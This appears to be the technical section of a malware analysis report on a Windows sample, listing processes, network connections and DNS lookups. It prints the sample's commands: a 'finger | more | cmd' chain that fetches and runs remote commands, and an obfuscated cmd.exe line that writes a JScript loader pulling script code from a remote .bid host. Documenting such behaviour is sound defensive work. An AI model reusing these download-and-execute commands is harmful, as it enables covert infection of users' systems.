Technical Information
- '<SYSTEM32>\finger.exe' ok@tbeet3.mercadaochapaferro.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\v2x.js"
- %LOCALAPPDATA%\v2x.js
- 'tb####.##rcadaochapaferro.email':79
- 'je####.auztdwffpykp.bid':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'tb####.##rcadaochapaferro.email':79
- 'cl###flare.com':443
- DNS ASK tb####.##rcadaochapaferro.email
- DNS ASK je####.auztdwffpykp.bid
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@tbeet3.mercadaochapaferro.email |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt MCUV=.j&&SEt MUURL=vDfUsarDfUs a =DfUs 'scDfUsriDfUsptDfUs:'; b =DfUs 'hDfUsTtPDfUs:'; GDfUsetDfUsObjDfUsecDfUst(DfUsa+b+'&&sET ZNZ7=ESUPZESUPZjeuaua.auztdwffpykp.bidESUPZ?1ESUPZ')&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p LI0YZ="%MUURL:DfUs=%%ZNZ7:ESUPZ=/%" 0<nul 1>%LOCALAPPDATA%\v2x%MCUV%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\v2x%MCUV%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\v2x.js